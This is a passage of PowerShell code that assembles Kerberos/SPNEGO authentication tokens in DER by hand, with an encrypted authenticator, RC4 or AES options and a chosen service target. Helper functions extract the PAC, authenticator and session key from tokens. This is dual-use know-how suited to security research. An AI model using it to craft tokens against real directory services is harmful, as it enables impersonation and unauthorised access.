                                                    Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x00, 0x81))

                                                    # AdETypeNegotiation
                                                    Add-DERTag -Tag 0xA1 -Data @(Add-DERTag -Tag 0x04 -Data @(
                                                        Add-DERSequence -Data @(
                                                                #Add-DERInteger -Data @(0x12) # AES256_CTS_HMAC_SHA1_96
                                                                #Add-DERInteger -Data @(0x11) # AES128_CTS_HMAC_SHA1_96
                                                                Add-DERInteger -Data @(0x17) # RC4_HMAC_NT
                                                            )
                                                        )
                                                    )
                                                )
                                                Add-DERSequence -Data @(
                                                    Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x00, 0x8D))
                                                    Add-DERTag -Tag 0xA1 -Data @(
                                                        Add-DERTag -Tag 0x04 -Data @(
                                                            
                                                            Add-DERSequence -Data @(
                                                                Add-DERSequence -Data @(
                                                                    Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x00)) #Restrictiontype = 0
                                                                    # Restrictions
                                                                        Add-DERTag -Tag 0xA1 -Data @(Add-DERTag -Tag 0x04 -Data @(
                                                                            # Flags = Full
                                                                            @(0x00, 0x00, 0x00, 0x00)
                                                                            # Integritylevel = Low
                                                                            @(0x00, 0x10, 0x00, 0x00)
                                                                            # Machine Id
                                                                            $machineId
                                                                        )
                                                                    )
                                                                )
                                                            
                                                            )
                                                       )
                                                  )
                                             )
           
                                                Add-DERSequence -Data @(
                                                    # KerbLocal
                                                    Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x00, 0x8E))
                                                    Add-DERTag -Tag 0xA1 -Data @(Add-DERTag -Tag 0x04 -Data $kerbLocal2)
                                                    )
                                                Add-DERSequence -Data @(
                                                    Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x00, 0x8F))
                                            
                                                    Add-DERTag -Tag 0xA1 -Data @(
                                                        Add-DERTag -Tag 0x04 -Data @(
                                                            # KerbApOptions = ChannelBindingSupported
                                                            @(0x00, 0x40, 0x00, 0x00)
                                                        )
                                                    )
                                                ) 
                                                    Add-DERSequence -Data @(
                                                        Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x00, 0x90))
                                            
                                                        Add-DERTag -Tag 0xA1 -Data @(
                                                            # KerbServiceTarget
                                                            Add-DERUnicodeString -Text "$ServiceTarget@$Realm"
                                                        )
                                                    )
                                           )
                                      )
                                 )
                            )
                       )
                  )
             )
        )
        $encryptedAuthenticator = Encrypt-Kerberos -Data $authenticator -Key $SessionKey -Type Authenticator -Salt $AESSalt -Crypto $Crypto

        # NegTokenInit
        $kerberosTicket=Add-DERTag -Tag 0x60 -Data @(
            Add-DERObjectIdentifier -ObjectIdentifier "1.3.6.1.5.5.2" # SPNEGO
            Add-DERTag -Tag 0xA0 -Data @(
    
                Add-DERSequence -Data @(
                    # MechTypeList
                    Add-DERTag -Tag 0xA0 -Data @( # MechTypeList
                        Add-DERSequence -Data @(
                            Add-DERObjectIdentifier -ObjectIdentifier "1.2.840.48018.1.2.2"    # Microsoft Kerberos OID
                            Add-DERObjectIdentifier -ObjectIdentifier "1.2.840.113554.1.2.2"   # Kerberos V5 OID
                            Add-DERObjectIdentifier -ObjectIdentifier "1.3.6.1.4.1.311.2.2.30" # Negoex
                            Add-DERObjectIdentifier -ObjectIdentifier "1.3.6.1.4.1.311.2.2.10" # NTLM
                        )
                    )
                    Add-DERTag -Tag 0xA2 -Data @( # MechToken
            

                        Add-DERTag -Tag 0x04 -Data @(
                            Add-DERTag -Tag 0x60 -Data @(# Application constructed object
                        
                                    Add-DERObjectIdentifier -ObjectIdentifier "1.2.840.113554.1.2.2"   # Kerberos V5 OID
                                    Add-DERBoolean -Value $False
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Add-DERTag -Tag 0x6E -Data @(
                            Add-DERSequence -Data @(
                                Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x05)) 
                                Add-DERTag -Tag 0xA1 -Data @(Add-DERInteger -Data @(0x0e)) 
                                Add-DERTag -Tag 0xA2 -Data @(Add-DERTag -Tag 0x03 -Data @(0x00, 0x20, 0x00, 0x00, 0x00)) # KERB_VALINFO
                                Add-DERTag -Tag 0xA3 -Data @(
                            # AUTHENTICATOR
                                    Add-DERTag -Tag 0x61 -Data @(
                                        Add-DERSequence -Data @(
                                        Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x05)) # AuthenticatorVersionNumber = 5
                                        Add-DERTag -Tag 0xA1 -Data @(Add-DERUtf8String -Text $Realm)
                                        Add-DERTag -Tag 0xA2 -Data @(
                                            Add-DERSequence -Data @(
                                                Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x02))
                                                Add-DERTag -Tag 0xA1 -Data @(
                                                    Add-DERSequence -Data @(
                                                        Add-DERUtf8String -Text $ServiceTarget.Split("/")[0]
                                                        Add-DERUtf8String -Text $ServiceTarget.Split("/")[1]
                                                    )
                                                )
                                            )
                                        )
                                        Add-DERTag -Tag 0xA3 -Data @(
                                            Add-DERSequence -Data @(
                                                if($Crypto -eq "RC4")
                                                {
                                                    Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x17)) # rc4-hmac
                                                }
                                                elseif($Crypto -eq "AES")
                                                {
                                                    Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x12)) # aes256-cts-hmac-sha1-96
                                                }
                                                Add-DERTag -Tag 0xA1 -Data @(Add-DERInteger -Data @(0x05)) 
                                                Add-DERTag -Tag 0xA2 -Data @(Add-DERTag -Tag 0x04 $encryptedTicket)
                                               
                                            )
                                        )
                                
                                    )
                                 )
                    
                    
                    
                            )

                            Add-DERTag -Tag 0xA4 -Data @(
                                            Add-DERSequence -Data @(
                                                if($Crypto -eq "RC4")
                                                {
                                                    Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x17)) # rc4-hmac
                                                }
                                                elseif($Crypto -eq "AES")
                                                {
                                                    Add-DERTag -Tag 0xA0 -Data @(Add-DERInteger -Data @(0x12)) # aes256-cts-hmac-sha1-96
                                                }
                                                Add-DERTag -Tag 0xA2 -Data @(Add-DERTag -Tag 0x04 $encryptedAuthenticator)

                                                
                                            )
                                        )
                                    )
                                )
                         
                            )
                        )
                    )
                )
            )
        )
        
        # Return
        $b64Ticket=[Convert]::ToBase64String([byte[]]$kerberosTicket)
        return $b64Ticket
    }
}


# Extracts PAC from the given Kerberos token
# Mar 26th 2021
function Get-PAC
{
    Param(
        [Parameter(Mandatory=$True)]
        [byte[]]$Token
    )
    Process
    {
        $parsedToken = Parse-Asn1 -Data $Token

        return $parsedToken.Data[1].Data.Data[1].Data.Data.Data[2].Data.Data[3].Data.Data.Data[3].Data.Data[2].Data.Data
    }
}

# Extracts Authenticator from the given Kerberos token
# Mar 26th 2021
function Get-Authenticator
{
    Param(
        [Parameter(Mandatory=$True)]
        [byte[]]$Token
    )
    Process
    {
        $parsedToken = Parse-Asn1 -Data $Token

        return $parsedToken.Data[1].Data.Data[1].Data.Data.Data[2].Data.Data[4].Data.Data[1].Data.Data
    }
}

# Parses PAC
# Mar 27th 2021
function Parse-PAC
{
    Param(
        [Parameter(Mandatory=$True)]
        [byte[]]$PAC
    )
    Process
    {
        # PAC doesn't have "root" element, so let's add one
        $newData = Add-DERSequence -Data $PAC
        return Parse-Asn1 -Data $newData
    }
}

# Parses Authenticator
# Mar 27th 2021
function Parse-Authenticator
{
    Param(
        [Parameter(Mandatory=$True)]
        [byte[]]$Authenticator
    )
    Process
    {
        # Authenticator doesn't have "root" element, so let's add one
        $newData = Add-DERSequence -Data $Authenticator
        return Parse-Asn1 -Data $newData
    }
}

# Gets the sessionkey from PAC
# Mar 26th 2021
function Get-SessionKeyFromPAC
{
    Param(
        [Parameter(Mandatory=$True)]
        [byte[]]$PAC
    )
    Process
    {
        $parsedPAC = Parse-PAC -PAC $PAC

        return $parsedPAC.Data.Data.Data[1].Data.Data[1].Data.Data
    }
}